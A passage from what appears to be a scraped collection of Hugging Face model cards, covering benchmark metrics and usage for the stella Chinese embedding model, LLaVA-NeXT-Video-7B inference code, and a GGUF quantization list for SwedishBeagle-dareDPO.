- type: max_f1
value: 84.39077936333699
- task:
type: Retrieval
dataset:
type: C-MTEB/CovidRetrieval
name: MTEB CovidRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 68.967
- type: map_at_10
value: 77.95299999999999
- type: map_at_100
value: 78.213
- type: map_at_1000
value: 78.21900000000001
- type: map_at_3
value: 76.30799999999999
- type: map_at_5
value: 77.316
- type: mrr_at_1
value: 69.125
- type: mrr_at_10
value: 77.886
- type: mrr_at_100
value: 78.141
- type: mrr_at_1000
value: 78.147
- type: mrr_at_3
value: 76.291
- type: mrr_at_5
value: 77.29700000000001
- type: ndcg_at_1
value: 69.231
- type: ndcg_at_10
value: 81.867
- type: ndcg_at_100
value: 82.982
- type: ndcg_at_1000
value: 83.12
- type: ndcg_at_3
value: 78.592
- type: ndcg_at_5
value: 80.39
- type: precision_at_1
value: 69.231
- type: precision_at_10
value: 9.494
- type: precision_at_100
value: 0.9990000000000001
- type: precision_at_1000
value: 0.101
- type: precision_at_3
value: 28.591
- type: precision_at_5
value: 18.061
- type: recall_at_1
value: 68.967
- type: recall_at_10
value: 93.941
- type: recall_at_100
value: 98.84100000000001
- type: recall_at_1000
value: 99.895
- type: recall_at_3
value: 85.142
- type: recall_at_5
value: 89.46300000000001
- task:
type: Retrieval
dataset:
type: C-MTEB/DuRetrieval
name: MTEB DuRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 25.824
- type: map_at_10
value: 79.396
- type: map_at_100
value: 82.253
- type: map_at_1000
value: 82.295
- type: map_at_3
value: 54.83
- type: map_at_5
value: 69.536
- type: mrr_at_1
value: 89.7
- type: mrr_at_10
value: 92.929
- type: mrr_at_100
value: 93.013
- type: mrr_at_1000
value: 93.015
- type: mrr_at_3
value: 92.658
- type: mrr_at_5
value: 92.841
- type: ndcg_at_1
value: 89.7
- type: ndcg_at_10
value: 86.797
- type: ndcg_at_100
value: 89.652
- type: ndcg_at_1000
value: 90.047
- type: ndcg_at_3
value: 85.651
- type: ndcg_at_5
value: 84.747
- type: precision_at_1
value: 89.7
- type: precision_at_10
value: 41.61
- type: precision_at_100
value: 4.788
- type: precision_at_1000
value: 0.488
- type: precision_at_3
value: 76.833
- type: precision_at_5
value: 65.14
- type: recall_at_1
value: 25.824
- type: recall_at_10
value: 87.896
- type: recall_at_100
value: 97.221
- type: recall_at_1000
value: 99.29599999999999
- type: recall_at_3
value: 57.178
- type: recall_at_5
value: 74.348
- task:
type: Retrieval
dataset:
type: C-MTEB/EcomRetrieval
name: MTEB EcomRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 52.5
- type: map_at_10
value: 63.04
- type: map_at_100
value: 63.548
- type: map_at_1000
value: 63.56
- type: map_at_3
value: 60.483
- type: map_at_5
value: 62.22800000000001
- type: mrr_at_1
value: 52.5
- type: mrr_at_10
value: 63.04
- type: mrr_at_100
value: 63.548
- type: mrr_at_1000
value: 63.56
- type: mrr_at_3
value: 60.483
- type: mrr_at_5
value: 62.22800000000001
- type: ndcg_at_1
value: 52.5
- type: ndcg_at_10
value: 68.099
- type: ndcg_at_100
value: 70.48400000000001
- type: ndcg_at_1000
value: 70.769
- type: ndcg_at_3
value: 63.01
- type: ndcg_at_5
value: 66.148
- type: precision_at_1
value: 52.5
- type: precision_at_10
value: 8.39
- type: precision_at_100
value: 0.9490000000000001
- type: precision_at_1000
value: 0.097
- type: precision_at_3
value: 23.433
- type: precision_at_5
value: 15.58
- type: recall_at_1
value: 52.5
- type: recall_at_10
value: 83.89999999999999
- type: recall_at_100
value: 94.89999999999999
- type: recall_at_1000
value: 97.1
- type: recall_at_3
value: 70.3
- type: recall_at_5
value: 77.9
- task:
type: Classification
dataset:
type: C-MTEB/IFlyTek-classification
name: MTEB IFlyTek
config: default
split: validation
revision: None
metrics:
- type: accuracy
value: 50.742593305117346
- type: f1
value: 38.7451988564002
- task:
type: Classification
dataset:
type: C-MTEB/JDReview-classification
name: MTEB JDReview
config: default
split: test
revision: None
metrics:
- type: accuracy
value: 86.09756097560977
- type: ap
value: 54.39255221143281
- type: f1
value: 80.8326851537251
- task:
type: STS
dataset:
type: C-MTEB/LCQMC
name: MTEB LCQMC
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 72.32408066246728
- type: cos_sim_spearman
value: 78.25773378380241
- type: euclidean_pearson
value: 77.87824677060661
- type: euclidean_spearman
value: 78.25773599854358
- type: manhattan_pearson
value: 77.86648277798515
- type: manhattan_spearman
value: 78.24642917155661
- task:
type: Reranking
dataset:
type: C-MTEB/Mmarco-reranking
name: MTEB MMarcoReranking
config: default
split: dev
revision: None
metrics:
- type: map
value: 28.846601097874608
- type: mrr
value: 27.902777777777775
- task:
type: Retrieval
dataset:
type: C-MTEB/MMarcoRetrieval
name: MTEB MMarcoRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 66.533
- type: map_at_10
value: 75.58399999999999
- type: map_at_100
value: 75.91
- type: map_at_1000
value: 75.921
- type: map_at_3
value: 73.847
- type: map_at_5
value: 74.929
- type: mrr_at_1
value: 68.854
- type: mrr_at_10
value: 76.20700000000001
- type: mrr_at_100
value: 76.498
- type: mrr_at_1000
value: 76.508
- type: mrr_at_3
value: 74.71600000000001
- type: mrr_at_5
value: 75.653
- type: ndcg_at_1
value: 68.854
- type: ndcg_at_10
value: 79.209
- type: ndcg_at_100
value: 80.67
- type: ndcg_at_1000
value: 80.95
- type: ndcg_at_3
value: 75.923
- type: ndcg_at_5
value: 77.74799999999999
- type: precision_at_1
value: 68.854
- type: precision_at_10
value: 9.547
- type: precision_at_100
value: 1.027
- type: precision_at_1000
value: 0.105
- type: precision_at_3
value: 28.582
- type: precision_at_5
value: 18.112000000000002
- type: recall_at_1
value: 66.533
- type: recall_at_10
value: 89.736
- type: recall_at_100
value: 96.34
- type: recall_at_1000
value: 98.52
- type: recall_at_3
value: 81.047
- type: recall_at_5
value: 85.38900000000001
- task:
type: Classification
dataset:
type: mteb/amazon_massive_intent
name: MTEB MassiveIntentClassification (zh-CN)
config: zh-CN
split: test
revision: 31efe3c427b0bae9c22cbb560b8f15491cc6bed7
metrics:
- type: accuracy
value: 73.27841291190316
- type: f1
value: 70.82287701665152
- task:
type: Classification
dataset:
type: mteb/amazon_massive_scenario
name: MTEB MassiveScenarioClassification (zh-CN)
config: zh-CN
split: test
revision: 7d571f92784cd94a019292a1f45445077d0ef634
metrics:
- type: accuracy
value: 76.20040349697376
- type: f1
value: 75.92782428878164
- task:
type: Retrieval
dataset:
type: C-MTEB/MedicalRetrieval
name: MTEB MedicalRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 56.39999999999999
- type: map_at_10
value: 62.122
- type: map_at_100
value: 62.692
- type: map_at_1000
value: 62.739
- type: map_at_3
value: 60.617
- type: map_at_5
value: 61.582
- type: mrr_at_1
value: 56.39999999999999
- type: mrr_at_10
value: 62.125
- type: mrr_at_100
value: 62.696
- type: mrr_at_1000
value: 62.742
- type: mrr_at_3
value: 60.617
- type: mrr_at_5
value: 61.602000000000004
- type: ndcg_at_1
value: 56.39999999999999
- type: ndcg_at_10
value: 64.986
- type: ndcg_at_100
value: 67.889
- type: ndcg_at_1000
value: 69.16499999999999
- type: ndcg_at_3
value: 61.951
- type: ndcg_at_5
value: 63.685
- type: precision_at_1
value: 56.39999999999999
- type: precision_at_10
value: 7.3999999999999995
- type: precision_at_100
value: 0.8789999999999999
- type: precision_at_1000
value: 0.098
- type: precision_at_3
value: 21.933
- type: precision_at_5
value: 14.000000000000002
- type: recall_at_1
value: 56.39999999999999
- type: recall_at_10
value: 74
- type: recall_at_100
value: 87.9
- type: recall_at_1000
value: 98
- type: recall_at_3
value: 65.8
- type: recall_at_5
value: 70
- task:
type: Classification
dataset:
type: C-MTEB/MultilingualSentiment-classification
name: MTEB MultilingualSentiment
config: default
split: validation
revision: None
metrics:
- type: accuracy
value: 76.64
- type: f1
value: 76.5446299028248
- task:
type: PairClassification
dataset:
type: C-MTEB/OCNLI
name: MTEB Ocnli
config: default
split: validation
revision: None
metrics:
- type: cos_sim_accuracy
value: 82.34975636166757
- type: cos_sim_ap
value: 85.51352392694149
- type: cos_sim_f1
value: 83.53057199211045
- type: cos_sim_precision
value: 78.35337650323775
- type: cos_sim_recall
value: 89.44033790918691
- type: dot_accuracy
value: 82.34975636166757
- type: dot_ap
value: 85.51347115601486
- type: dot_f1
value: 83.53057199211045
- type: dot_precision
value: 78.35337650323775
- type: dot_recall
value: 89.44033790918691
- type: euclidean_accuracy
value: 82.34975636166757
- type: euclidean_ap
value: 85.51352392694149
- type: euclidean_f1
value: 83.53057199211045
- type: euclidean_precision
value: 78.35337650323775
- type: euclidean_recall
value: 89.44033790918691
- type: manhattan_accuracy
value: 82.34975636166757
- type: manhattan_ap
value: 85.48313896880585
- type: manhattan_f1
value: 83.52414136386261
- type: manhattan_precision
value: 79.00188323917138
- type: manhattan_recall
value: 88.59556494192185
- type: max_accuracy
value: 82.34975636166757
- type: max_ap
value: 85.51352392694149
- type: max_f1
value: 83.53057199211045
- task:
type: Classification
dataset:
type: C-MTEB/OnlineShopping-classification
name: MTEB OnlineShopping
config: default
split: test
revision: None
metrics:
- type: accuracy
value: 93.39
- type: ap
value: 91.62127505252761
- type: f1
value: 93.38126146765326
- task:
type: STS
dataset:
type: C-MTEB/PAWSX
name: MTEB PAWSX
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 39.69424895486595
- type: cos_sim_spearman
value: 45.357868735202885
- type: euclidean_pearson
value: 44.85027304963503
- type: euclidean_spearman
value: 45.356945176162064
- type: manhattan_pearson
value: 44.866080721344744
- type: manhattan_spearman
value: 45.37053172312661
- task:
type: STS
dataset:
type: C-MTEB/QBQTC
name: MTEB QBQTC
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 37.03908089465844
- type: cos_sim_spearman
value: 38.98314179826781
- type: euclidean_pearson
value: 37.189386019789545
- type: euclidean_spearman
value: 38.98311189555396
- type: manhattan_pearson
value: 37.14695118899785
- type: manhattan_spearman
value: 38.94957261261034
- task:
type: STS
dataset:
type: mteb/sts22-crosslingual-sts
name: MTEB STS22 (zh)
config: zh
split: test
revision: 6d1ba47164174a496b7fa5d3569dae26a6813b80
metrics:
- type: cos_sim_pearson
value: 65.08396305098712
- type: cos_sim_spearman
value: 66.26346934994216
- type: euclidean_pearson
value: 65.56501615370941
- type: euclidean_spearman
value: 66.26346934994216
- type: manhattan_pearson
value: 65.47984748172154
- type: manhattan_spearman
value: 66.25326746119808
- task:
type: STS
dataset:
type: C-MTEB/STSB
name: MTEB STSB
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 80.95965207330296
- type: cos_sim_spearman
value: 82.96149593569953
- type: euclidean_pearson
value: 82.67125448003975
- type: euclidean_spearman
value: 82.96141174550262
- type: manhattan_pearson
value: 82.64660468206361
- type: manhattan_spearman
value: 82.91756025324656
- task:
type: Reranking
dataset:
type: C-MTEB/T2Reranking
name: MTEB T2Reranking
config: default
split: dev
revision: None
metrics:
- type: map
value: 66.43391960680063
- type: mrr
value: 76.078440855015
- task:
type: Retrieval
dataset:
type: C-MTEB/T2Retrieval
name: MTEB T2Retrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 28.29
- type: map_at_10
value: 78.441
- type: map_at_100
value: 82.043
- type: map_at_1000
value: 82.10499999999999
- type: map_at_3
value: 55.448
- type: map_at_5
value: 67.982
- type: mrr_at_1
value: 91.18
- type: mrr_at_10
value: 93.498
- type: mrr_at_100
value: 93.57
- type: mrr_at_1000
value: 93.572
- type: mrr_at_3
value: 93.112
- type: mrr_at_5
value: 93.351
- type: ndcg_at_1
value: 91.18
- type: ndcg_at_10
value: 85.849
- type: ndcg_at_100
value: 89.32600000000001
- type: ndcg_at_1000
value: 89.9
- type: ndcg_at_3
value: 87.333
- type: ndcg_at_5
value: 85.91499999999999
- type: precision_at_1
value: 91.18
- type: precision_at_10
value: 42.315000000000005
- type: precision_at_100
value: 5.029
- type: precision_at_1000
value: 0.517
- type: precision_at_3
value: 76.12400000000001
- type: precision_at_5
value: 63.690000000000005
- type: recall_at_1
value: 28.29
- type: recall_at_10
value: 84.679
- type: recall_at_100
value: 95.952
- type: recall_at_1000
value: 98.821
- type: recall_at_3
value: 56.987
- type: recall_at_5
value: 71.15599999999999
- task:
type: Classification
dataset:
type: C-MTEB/TNews-classification
name: MTEB TNews
config: default
split: validation
revision: None
metrics:
- type: accuracy
value: 53.09799999999999
- type: f1
value: 51.397192036892314
- task:
type: Clustering
dataset:
type: C-MTEB/ThuNewsClusteringP2P
name: MTEB ThuNewsClusteringP2P
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 70.59693805158501
- task:
type: Clustering
dataset:
type: C-MTEB/ThuNewsClusteringS2S
name: MTEB ThuNewsClusteringS2S
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 63.21127290121542
- task:
type: Retrieval
dataset:
type: C-MTEB/VideoRetrieval
name: MTEB VideoRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 61.3
- type: map_at_10
value: 70.658
- type: map_at_100
value: 71.096
- type: map_at_1000
value: 71.108
- type: map_at_3
value: 69.15
- type: map_at_5
value: 70.125
- type: mrr_at_1
value: 61.3
- type: mrr_at_10
value: 70.658
- type: mrr_at_100
value: 71.096
- type: mrr_at_1000
value: 71.108
- type: mrr_at_3
value: 69.15
- type: mrr_at_5
value: 70.125
- type: ndcg_at_1
value: 61.3
- type: ndcg_at_10
value: 74.71
- type: ndcg_at_100
value: 76.783
- type: ndcg_at_1000
value: 77.09899999999999
- type: ndcg_at_3
value: 71.634
- type: ndcg_at_5
value: 73.399
- type: precision_at_1
value: 61.3
- type: precision_at_10
value: 8.72
- type: precision_at_100
value: 0.967
- type: precision_at_1000
value: 0.099
- type: precision_at_3
value: 26.267000000000003
- type: precision_at_5
value: 16.619999999999997
- type: recall_at_1
value: 61.3
- type: recall_at_10
value: 87.2
- type: recall_at_100
value: 96.7
- type: recall_at_1000
value: 99.2
- type: recall_at_3
value: 78.8
- type: recall_at_5
value: 83.1
- task:
type: Classification
dataset:
type: C-MTEB/waimai-classification
name: MTEB Waimai
config: default
split: test
revision: None
metrics:
- type: accuracy
value: 88.01
- type: ap
value: 72.51537272974005
- type: f1
value: 86.49546025793478
license: mit
---
**News**
**[2024-04-06]** Released the open-source [puff](https://huggingface.co/infgrad/puff-base-v1) series of models, **built specifically for retrieval and semantic-matching tasks, with extra attention to generalization and performance on private general-purpose test sets; variable vector dimensions; bilingual (Chinese and English)**.
**[2024-02-27]** Released the open-source stella-mrl-large-zh-v3.5-1792d model, which supports **variable vector dimensions**.
**[2024-02-17]** Released the open-source stella v3 series, the dialogue encoding models, and the related training data.
**[2023-10-19]** Released the open-source stella-base-en-v2; simple to use, **no prefix text required**.
**[2023-10-12]** Released the open-source stella-base-zh-v2 and stella-large-zh-v2; better results and simple to use, **no prefix text required**.
**[2023-09-11]** Released the open-source stella-base-zh and stella-large-zh.
Feel free to visit [my profile page](https://huggingface.co/infgrad) for the latest models, and your feedback is very welcome!
# 1 Open-source model
This release open-sources the stella-mrl-large-zh-v3.5-1792d model.
It is trained on top of stella-large-zh-v3-1792d using the [MRL](https://arxiv.org/abs/2205.13147) method.
Its main feature is a **variable vector dimension**.
# 2 Usage
```python
from sentence_transformers import SentenceTransformer
from sklearn.preprocessing import normalize
model = SentenceTransformer("infgrad/stella-mrl-large-zh-v3.5-1792d")
# Note: do not normalize yet! Select the first n dimensions first, then normalize.
vectors = model.encode(["text1", "text2"], normalize_embeddings=False)
print(vectors.shape) # shape is [2,1792]
# The larger n_dims, the better the quality, but the higher the time/memory cost. A multiple of 128 is recommended, since that is how the model was trained.
n_dims = 768
cut_vecs = normalize(vectors[:, :n_dims])
```
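As a small follow-up usage example, the sketch below (the two example sentences are placeholders) scores similarity with the truncated, re-normalized vectors:
```python
import numpy as np
from sentence_transformers import SentenceTransformer
from sklearn.preprocessing import normalize

model = SentenceTransformer("infgrad/stella-mrl-large-zh-v3.5-1792d")

# Encode without normalization, keep the first n_dims dimensions, then normalize.
vectors = model.encode(["今天天气真好", "今天天气怎么样"], normalize_embeddings=False)
cut_vecs = normalize(vectors[:, :768])

# After normalization, cosine similarity reduces to a dot product.
print(float(np.dot(cut_vecs[0], cut_vecs[1])))
```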
# 3 CMTEB scores at different vector dimensions
stella-mrl-large-zh-v3.5-1792d_1024 means using only the first 1024 dimensions. The overall trend is that larger dimensions give better results.
| Model | Retrieval | STS | PairClassification | Classification | Reranking | Clustering | CMTEB-Score |
|:------------------------------------|:---------:|:-----:|:------------------:|:--------------:|:---------:|:----------:|:-----------:|
| stella-mrl-large-zh-v3.5-1792d_128 | 70.01 | 62.17 | 87.99 | 70.67 | 66.77 | 53.55 | 67.16 |
| stella-mrl-large-zh-v3.5-1792d_256 | 72.19 | 62.41 | 88.09 | 71.22 | 68.32 | 53.38 | 68.02 |
| stella-mrl-large-zh-v3.5-1792d_384 | 72.77 | 62.43 | 88.26 | 71.34 | 68.31 | 53.87 | 68.25 |
| stella-mrl-large-zh-v3.5-1792d_512 | 73.11 | 62.45 | 88.16 | 71.46 | 68.32 | 53.28 | 68.29 |
| stella-mrl-large-zh-v3.5-1792d_640 | 73.27 | 62.49 | 88.21 | 71.46 | 68.69 | 53.63 | 68.42 |
| stella-mrl-large-zh-v3.5-1792d_768 | 73.38 | 62.5 | 88.19 | 71.49 | 68.64 | 53.77 | 68.47 |
| stella-mrl-large-zh-v3.5-1792d_896 | 73.37 | 62.5 | 88.14 | 71.51 | 68.44 | 54.13 | 68.49 |
| stella-mrl-large-zh-v3.5-1792d_1024 | 73.43 | 62.51 | 88.16 | 71.52 | 68.59 | 53.43 | 68.44 |
| stella-mrl-large-zh-v3.5-1792d_1152 | 73.46 | 62.49 | 88.16 | 71.57 | 68.55 | 53.67 | 68.49 |
| stella-mrl-large-zh-v3.5-1792d_1280 | 73.48 | 62.51 | 88.12 | 71.55 | 68.44 | 53.74 | 68.48 |
| stella-mrl-large-zh-v3.5-1792d_1408 | 73.48 | 62.51 | 88.14 | 71.58 | 68.46 | 53.69 | 68.48 |
| stella-mrl-large-zh-v3.5-1792d_1536 | 73.49 | 62.5 | 88.11 | 71.55 | 68.5 | 54.06 | 68.52 |
| stella-mrl-large-zh-v3.5-1792d_1664 | 73.56 | 62.49 | 88.06 | 71.56 | 68.47 | 54.28 | 68.56 |
| stella-mrl-large-zh-v3.5-1792d_1792 | 73.51 | 62.48 | 88.09 | 71.56 | 68.45 | 54.39 | 68.56 |
In the table above, the score of 68.56 for stella-mrl-large-zh-v3.5-1792d_1792 differs slightly from the 68.55 shown on the leaderboard; the difference comes from the weight dtype and is small enough to ignore. |
anhduy0911/LLM-IE-Healthcare | anhduy0911 | "2024-07-02T06:33:01Z" | 3,585 | 0 | transformers | [
"transformers",
"llama",
"text-generation",
"license:llama3",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"4-bit",
"gptq",
"region:us"
] | text-generation | "2024-07-02T03:01:18Z" | ---
license: llama3
---
|
llava-hf/LLaVA-NeXT-Video-7B-hf | llava-hf | "2024-06-17T07:52:37Z" | 3,584 | 7 | transformers | [
"transformers",
"safetensors",
"llava_next",
"pretraining",
"image-text-to-text",
"en",
"dataset:lmms-lab/VideoChatGPT",
"arxiv:2405.21075",
"license:llama2",
"endpoints_compatible",
"region:us"
] | image-text-to-text | "2024-06-05T13:28:32Z" | ---
language:
- en
license: llama2
pipeline_tag: image-text-to-text
datasets:
- lmms-lab/VideoChatGPT
---
# LLaVA-NeXT-Video Model Card
Check out also the Google Colab demo to run Llava on a free-tier Google Colab instance: [](https://colab.research.google.com/drive/1CZggLHrjxMReG-FNOmqSOdi4z7NPq6SO?usp=sharing)
Disclaimer: The team releasing LLaVa-NeXT-Video did not write a model card for this model so this model card has been written by the Hugging Face team.
## 📄 Model details
**Model type:**
LLaVA-NeXT-Video is an open-source chatbot trained by fine-tuning an LLM on multimodal instruction-following data. The model is built on top of LLaVA-NeXT by tuning on a mix of video and image data to achieve better video understanding capabilities. The videos were sampled uniformly at 32 frames per clip.
The model is a current SOTA among open-source models on [VideoMME bench](https://arxiv.org/abs/2405.21075).
Base LLM: [lmsys/vicuna-7b-v1.5](https://huggingface.co/lmsys/vicuna-7b-v1.5)

**Model date:**
LLaVA-Next-Video-7B was trained in April 2024.
**Paper or resources for more information:** https://github.com/LLaVA-VL/LLaVA-NeXT
## 📚 Training dataset
### Image
- 558K filtered image-text pairs from LAION/CC/SBU, captioned by BLIP.
- 158K GPT-generated multimodal instruction-following data.
- 500K academic-task-oriented VQA data mixture.
- 50K GPT-4V data mixture.
- 40K ShareGPT data.
### Video
- 100K VideoChatGPT-Instruct.
## 📊 Evaluation dataset
A collection of 4 benchmarks, including 3 academic VQA benchmarks and 1 captioning benchmark.
## 🚀 How to use the model
First, make sure to have `transformers >= 4.42.0`.
The model supports multi-visual and multi-prompt generation, meaning that you can pass multiple images/videos in your prompt. Also make sure to follow the correct prompt template (`USER: xxx\nASSISTANT:`) and add the token `<image>` or `<video>` at the location where you want to query images/videos:
Below is an example script to run generation in `float16` precision on a GPU device:
```python
import av
import numpy as np
import torch
from huggingface_hub import hf_hub_download
from transformers import LlavaNextVideoProcessor, LlavaNextVideoForConditionalGeneration
model_id = "llava-hf/LLaVA-NeXT-Video-7B-hf"
model = LlavaNextVideoForConditionalGeneration.from_pretrained(
model_id,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
).to(0)
processor = LlavaNextVideoProcessor.from_pretrained(model_id)
def read_video_pyav(container, indices):
'''
Decode the video with PyAV decoder.
Args:
container (`av.container.input.InputContainer`): PyAV container.
indices (`List[int]`): List of frame indices to decode.
Returns:
result (np.ndarray): np array of decoded frames of shape (num_frames, height, width, 3).
'''
frames = []
container.seek(0)
start_index = indices[0]
end_index = indices[-1]
for i, frame in enumerate(container.decode(video=0)):
if i > end_index:
break
if i >= start_index and i in indices:
frames.append(frame)
return np.stack([x.to_ndarray(format="rgb24") for x in frames])
# define a chat history and use `apply_chat_template` to get a correctly formatted prompt
# Each value in "content" has to be a list of dicts with types ("text", "image", "video")
conversation = [
{
"role": "user",
"content": [
{"type": "text", "text": "Why is this video funny?"},
{"type": "video"},
],
},
]
prompt = processor.apply_chat_template(conversation, add_generation_prompt=True)
video_path = hf_hub_download(repo_id="raushan-testing-hf/videos-test", filename="sample_demo_1.mp4", repo_type="dataset")
container = av.open(video_path)
# sample uniformly 8 frames from the video, can sample more for longer videos
total_frames = container.streams.video[0].frames
indices = np.arange(0, total_frames, total_frames / 8).astype(int)
clip = read_video_pyav(container, indices)
inputs_video = processor(text=prompt, videos=clip, padding=True, return_tensors="pt").to(model.device)
output = model.generate(**inputs_video, max_new_tokens=100, do_sample=False)
print(processor.decode(output[0][2:], skip_special_tokens=True))
```
### Inference with images as inputs
To generate from images use the below code after loading the model as shown above:
```python
import requests
from PIL import Image
conversation = [
{
"role": "user",
"content": [
{"type": "text", "text": "What are these?"},
{"type": "image"},
],
},
]
prompt = processor.apply_chat_template(conversation, add_generation_prompt=True)
image_file = "http://images.cocodataset.org/val2017/000000039769.jpg"
raw_image = Image.open(requests.get(image_file, stream=True).raw)
inputs_image = processor(prompt, images=raw_image, return_tensors='pt').to(0, torch.float16)
output = model.generate(**inputs_image, max_new_tokens=100, do_sample=False)
print(processor.decode(output[0][2:], skip_special_tokens=True))
```
### Inference with images and videos as inputs
To generate from images and videos in one generate use the below code after loading the model as shown above:
```python
conversation_1 = [
{
"role": "user",
"content": [
{"type": "text", "text": "What's the content of the image>"},
{"type": "image"},
],
}
]
conversation_2 = [
{
"role": "user",
"content": [
{"type": "text", "text": "Why is this video funny?"},
{"type": "video"},
],
},
]
prompt_1 = processor.apply_chat_template(conversation_1, add_generation_prompt=True)
prompt_2 = processor.apply_chat_template(conversation_2, add_generation_prompt=True)
# reuse `raw_image` and `clip` from the previous snippets
inputs = processor(text=[prompt_1, prompt_2], images=raw_image, videos=clip, padding=True, return_tensors="pt").to(model.device)
# Generate
generate_ids = model.generate(**inputs, max_new_tokens=100)
out = processor.batch_decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)
print(out)
```
### Model optimization
#### 4-bit quantization through `bitsandbytes` library
First make sure to install `bitsandbytes` (`pip install bitsandbytes`) and that you have access to a CUDA-compatible GPU device. Simply change the snippet above with:
```diff
model = LlavaNextVideoForConditionalGeneration.from_pretrained(
model_id,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
+ load_in_4bit=True
)
```
#### Use Flash-Attention 2 to further speed-up generation
First make sure to install `flash-attn`. Refer to the [original repository of Flash Attention](https://github.com/Dao-AILab/flash-attention) for instructions on installing that package. Simply change the snippet above with:
```diff
model = LlavaNextVideoForConditionalGeneration.from_pretrained(
model_id,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
+ use_flash_attention_2=True
).to(0)
```
## 🔒 License
Llama 2 is licensed under the LLAMA 2 Community License,
Copyright (c) Meta Platforms, Inc. All Rights Reserved.
## ✏️ Citation
If you find our paper and code useful in your research:
```BibTeX
@misc{zhang2024llavanextvideo,
title={LLaVA-NeXT: A Strong Zero-shot Video Understanding Model},
url={https://llava-vl.github.io/blog/2024-04-30-llava-next-video/},
author={Zhang, Yuanhan and Li, Bo and Liu, haotian and Lee, Yong jae and Gui, Liangke and Fu, Di and Feng, Jiashi and Liu, Ziwei and Li, Chunyuan},
month={April},
year={2024}
}
```
```BibTeX
@misc{liu2024llavanext,
title={LLaVA-NeXT: Improved reasoning, OCR, and world knowledge},
url={https://llava-vl.github.io/blog/2024-01-30-llava-next/},
author={Liu, Haotian and Li, Chunyuan and Li, Yuheng and Li, Bo and Zhang, Yuanhan and Shen, Sheng and Lee, Yong Jae},
month={January},
year={2024}
}
``` |
mradermacher/SwedishBeagle-dareDPO-GGUF | mradermacher | "2024-06-03T04:48:42Z" | 3,583 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:FredrikBL/SwedishBeagle-dareDPO",
"endpoints_compatible",
"region:us"
] | null | "2024-06-03T04:22:27Z" | ---
base_model: FredrikBL/SwedishBeagle-dareDPO
language:
- en
library_name: transformers
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/FredrikBL/SwedishBeagle-dareDPO
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
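For a quick local test, one option is the `llama-cpp-python` bindings; the sketch below is a hedged example under that assumption (the GGUF file name is taken from the Q4_K_M entry listed below), not an official usage recipe:
```python
# Hedged sketch using llama-cpp-python (pip install llama-cpp-python).
# Download the Q4_K_M file from the table below before running this.
from llama_cpp import Llama

llm = Llama(model_path="SwedishBeagle-dareDPO.Q4_K_M.gguf", n_ctx=4096)
out = llm("Skriv en kort dikt om hösten.", max_tokens=64)
print(out["choices"][0]["text"])
```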
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
